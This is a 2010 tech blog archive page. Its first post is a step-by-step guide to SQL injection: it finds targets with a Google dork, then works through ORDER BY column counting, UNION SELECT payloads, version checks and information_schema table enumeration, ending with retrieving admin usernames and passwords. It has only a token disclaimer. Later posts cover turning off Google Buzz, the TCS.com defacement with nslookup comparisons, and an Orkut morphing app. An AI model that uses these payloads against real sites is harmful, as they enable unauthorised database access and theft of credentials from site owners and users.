Archive

Archive for February, 2010

How to perform a SQL injection?

February 18, 2010 5 comments

First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique  that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.

Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘.  If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.

1. Check the vulnerability by adding ‘ to the above link.

If you get an error message it means that the site is vulnerable to SQL injection.

Now you can be damn sure that the site is vulnerable to SQL injection.

2. Find out the number of columns

To find number of columns we use statement ORDER BY

Just increment the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1– <– no error

http://www.site.com/abc.php?id=5 order by 2– <– no error

http://www.site.com/abc.php?id=5 order by 3– <– no error

http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ‘4’ )

So we can conclude that the table have 4 columns

3. Check whether UNION function works or not

http://www.site.com/abc.php?id=5 union all select 1,2,3–

We will get a number on the screen. Lets say we get the number 2 at this step.

4. Check for MySQL version by replacing 2 in the above step by version()

http://www.site.com/abc.php?id=5 union all select 1,version(),3–

Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.

// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //

5. Use information_schema

Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.

To get tables we use table_name and information_schema.tables

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–

6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.

//PLEASE DONT USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES

Advertisements
Categories: Hack Tags: ,

How to turn off Buzz in Gmail?

February 11, 2010 3 comments

Everyone have just started using Google buzz and many are still to contemplate it. Still the WebMonkey want to tell you about how to turn OFF the google buzz. So if you haven’t liked de BUZZZZZes in gmail, just follow the steps given below.
1. Login to GMAIL
2. Scroll down to the bottom of the page
3. Click the ‘Turn off Buzz’ link

Turning off Google Buzz

Now what if you want the Google Buzz back. Just click the ‘ Turn on Buzz ‘ link at the bottom.

Categories: Google, Social Networking Tags:

TCS.com hack exposes difference between Google public DNS and open DNS services

February 7, 2010 8 comments

TCS.com belonging to Tata Consulatcny Services was hacked earlier todaya and it is claimed to be a attack over a DNS loophole.

Using nslookup, the diiference between Google public DNS and open DNS were studied.

On using nslookup for openDNS the result for both tcs.com and http://www.tcs.com were the same.

nslookup for tcs.com and www.tcs.com in open DNS

On using nslookup for Google public DNS the result for both tcs.com and http://www.tcs.com were different.

For http://www.tcs.com the Address was 205.178.152.154 while for tcs.com it was 216.15.200.140.
nslookup for www.tcs.com and tcs.com in Google public DNS

Thanks to Albins for pointing out the difference.

Categories: Hack Tags: , , , ,

Official site of Tata Consultancy Services gets hacked by a French cracker

February 7, 2010 3 comments

The website http://www.tcs.com which belongs to India’s IT giant Tata Consultancy Services gets hacked by a French hacker. When I write this post, the TCS group have not still resolved the problem. Itx more likely that it is not a web software hack,but an attack through DNS loophole.
If you visit TCS.com you will get a screenshot as shown below, telling that they have put up the domain name for sale.
TCS hacked: puts up the domain name for sale

Categories: Hack Tags: , ,

People Hopper : Morphing Application in Orkut

February 6, 2010 Leave a comment

On February 4th,2010 orkut launched a new app called ‘People Hopper’. It lets you take your profile image and “morph” it into your friend’s photo.

Given two images, it hops across millions of public images in orkut so that one image is smoothly transformed into another. No computer graphics tricks are used and every image along the transition comes from real orkut users.

Try People Hopper at here

For more information visit Orkut blog

Categories: Social Networking Tags: , ,